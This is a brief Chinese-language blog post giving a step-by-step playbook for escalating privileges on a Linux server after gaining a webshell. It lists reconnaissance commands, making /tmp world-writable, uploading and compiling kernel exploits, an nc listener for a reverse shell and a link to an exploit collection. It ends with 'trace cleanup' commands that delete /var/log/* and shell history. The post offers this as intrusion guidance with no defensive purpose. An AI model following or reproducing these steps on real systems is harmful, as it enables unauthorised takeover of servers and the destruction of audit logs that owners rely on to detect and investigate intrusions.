Swane's blog

游弋于黑白之间,但愿我未曾来过……

导航

linux提权基本思路整理

拿到linux服务器的webshell后,先看有没有执行命令的权限

uname -a查看linux的内核版本

gcc --help试探服务器是否可以进行gcc编译(有些exp没有编译)

访问/tmp目录,看是否有所有权限

如果没有,则通过 chmod -R 777 开启

上传对应内核版本的exp到/tmp目录,然后执行./exp名

没编译的则运行gcc -o /tmp/文件名 /tmp/文件名.c

 nc反弹

nc -l -n -v -p 12666

附个常用exp收集地址:http://exp.0x80c.com/

 

痕迹清理:

rm -f -r /var/log/*
rm .bash_history
rm recently_used

posted on 2014-03-15 10:54  无名组  阅读(280)  评论(0编辑  收藏  举报